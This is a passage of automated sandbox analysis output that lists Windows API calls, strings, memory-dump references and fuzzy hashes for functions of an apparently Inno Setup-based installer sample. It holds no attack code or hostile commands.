• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
• GetCurrentThreadId.KERNEL32 ref: 00430971
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
  • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
  • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
• OemToCharA.USER32(?,?), ref: 0042375C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
• GetCurrentThreadId.KERNEL32 ref: 00418F79
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
  • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
  • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
  • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
  • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
  • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
  • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
  • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                            • API String ID: 316262546-2767913252
                                                                                                                            • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                            • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                                            • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                            • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3887896539-0
                                                                                                                            • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                            • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                                            • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                            • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                                            Strings
                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                                            • WININIT.INI, xrefs: 004557E4
                                                                                                                            • PendingFileRenameOperations, xrefs: 00455754
                                                                                                                            • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                            • API String ID: 47109696-2199428270
                                                                                                                            • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                            • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                                            • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                            • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                                            • API String ID: 1375471231-2952887711
                                                                                                                            • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                            • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                                            • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                            • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                            • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnumLongWindows
                                                                                                                            • String ID: \AB
                                                                                                                            • API String ID: 4191631535-3948367934
                                                                                                                            • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                            • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                                            • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                            • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                            • String ID: he
                                                                                                                            • API String ID: 730355536-1137534704
                                                                                                                            • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                            • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                            • API String ID: 588496660-1846899949
                                                                                                                            • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                            • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                                            • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                            • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                                            • NextButtonClick, xrefs: 0046BC4C
                                                                                                                            • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                            • API String ID: 0-2329492092
                                                                                                                            • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                            • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                                            • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                            • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                                                            • String ID: $Need to restart Windows? %s
                                                                                                                            • API String ID: 1160245247-4200181552
                                                                                                                            • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                            • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                                            • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                            • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                            • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                            • String ID: Creating directory: %s
                                                                                                                            • API String ID: 2451617938-483064649
                                                                                                                            • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                            • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                                            • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                            • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                            • API String ID: 2508298434-591603554
                                                                                                                            • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                            • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                                            • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                            • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • 74D31520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                                            • 74D31500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
